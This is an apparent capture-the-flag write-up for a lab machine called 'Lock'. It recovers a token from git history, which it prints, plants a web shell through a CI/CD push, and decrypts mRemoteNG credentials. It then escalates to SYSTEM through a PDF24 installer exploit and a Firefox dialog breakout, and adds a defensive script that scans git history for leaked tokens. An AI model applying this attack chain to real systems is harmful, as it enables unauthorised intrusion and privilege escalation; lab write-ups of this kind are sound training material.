Lock (easy)
port scan

web discovery
We have a git leak,

but it returns 403.
Gitea discovery


Use git log -p to dump all the diffs. We found a token: 43ce39bb0bd6bc489284f2905f033ca467a6362f

It worked!
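
The token was recoverable because git keeps every earlier version of a file, even after a later commit deletes the secret. As an added example (not part of the original writeup), this Python script scans `git log -p` output for 40-hex-character strings on added or removed lines, so a repository owner can find credentials that need rotating. The sample log, file name, commit ids and token are constructed, and the 40-hex token shape is an assumption based on the token above.

```python
import re

# Constructed `git log -p` output, newest commit first (not from the target repo).
FAKE_TOKEN = "0123456789abcdef0123456789abcdef01234567"
NEW, OLD = "1" * 40, "2" * 40  # constructed commit ids
SAMPLE_LOG = f"""\
commit {NEW}

    read token from environment

diff --git a/deploy.py b/deploy.py
--- a/deploy.py
+++ b/deploy.py
@@ -1,2 +1,2 @@
-TOKEN = "{FAKE_TOKEN}"
+TOKEN = os.environ["API_TOKEN"]
 URL = "http://gitea.example.test/api/v1"

commit {OLD}

    initial commit

diff --git a/deploy.py b/deploy.py
--- /dev/null
+++ b/deploy.py
@@ -0,0 +1,2 @@
+TOKEN = "{FAKE_TOKEN}"
+URL = "http://gitea.example.test/api/v1"
"""

TOKEN_RE = re.compile(r"\b[0-9a-f]{40}\b")  # assumed token shape: 40 hex chars

def scan_history(log_text):
    """Return (commit, sign, path, token) for token-shaped strings in diff hunks."""
    findings, commit, path, in_hunk = [], None, None, False
    for line in log_text.splitlines():
        if line.startswith("commit "):
            commit, in_hunk = line.split()[1], False
        elif line.startswith("diff --git "):
            path, in_hunk = line.split(" b/", 1)[1], False
        elif line.startswith("@@"):
            in_hunk = True
        elif in_hunk and line.startswith(("+", "-")):
            findings += [(commit, line[0], path, t) for t in TOKEN_RE.findall(line)]
    return findings

def removed_but_recoverable(findings):
    """Tokens a later commit deleted: absent from HEAD, still readable in history."""
    return {t for _, sign, _, t in findings if sign == "-"}
```

On a real repository, feed it the output of `git log -p --all`. Any hit means the credential has to be revoked, because removing it in a later commit leaves it in history.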

get a shell
We have website.git.

We can clone the repo using the git clone $token@$target_repo format.

CI/CD is enabled, which means we can change this repo and get a shell via CI/CD.

Add shell.aspx to the project directory.
Just push our evil code to the remote repo.

Use the curl command and we get a shell!

runas Gale.Dekarios
There are some creds.


The Gale.Dekarios user's encrypted password is in config.xml.

So this is something called mRemoteNG.

Now we have the plaintext password.

We can use this password to RDP into the target.

Privilege Escalation
There is a piece of software called PDF24 installed.
Google it!


This exploit seems to require the installed .msi, so we have to find an MSI file called pdf24-creator-11.14.0-x64.msi.

Got it!

Build the tool.

Wait some time.

We have a SYSTEM cmd!

Just follow the post; our goal is to open a web browser.

Select legacy console mode.

Don't select Edge. It seems Edge can't run on this Windows version; it doesn't pop up.

We launch the Firefox web browser as SYSTEM.


In Firefox, open a file with Ctrl + O.


We get a SYSTEM cmd shell!